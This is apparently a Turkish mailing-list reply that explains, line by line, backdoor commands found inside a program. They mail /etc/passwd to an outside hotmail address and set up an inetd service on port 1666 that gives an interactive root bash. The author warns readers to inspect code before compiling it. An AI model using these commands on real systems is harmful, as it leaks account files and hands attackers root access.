> Tam olarak ne yapiyor bu komutlar?
>
> > system ("mail ****@hotmail.com -s alo < /etc/passwd >/dev/null");
****@hotmail.com'a alo subjectinde bir mail atiyor
bu mailin icine de /etc/password dosyasini stick ediyor.
> > system ("echo 'slayer 1666/tcp' >>/etc/services ");
1666. portta tcp protokolunde calismak uzre bir service aciyor, adini da
slayer koyuyor.
> > system ("echo 'slayer stream tcp nowait root /bin/bash bash -i'
> > >>/etc/inetd.conf");
inetd.conf dosyasinin icine az once tanimladigi slayer daemonunun
tanimlarini yapiyor, 1666. porta baglanti yapildiginda calisacak programi
yaziyor. bash -i paramteresiyle interaktif shell aciyor. root hakkiyla.
> > system ("killall -HUP inetd");
inetd'yi yeniden baslatiyor.
aldiginiz her programi direk compile edip calistirmayin, birazcik icine
bakip neler oldugunu anlamaya calisin ya da birine gosterin. bu tur
backdoorlar eski ve klasik turden ama bu islerini tam olarak yapmiyorlar
anlamina gelmiyor tabi.
kolay gelsin
__
Murat Arslan
PGP KeyID: 2047/673351F1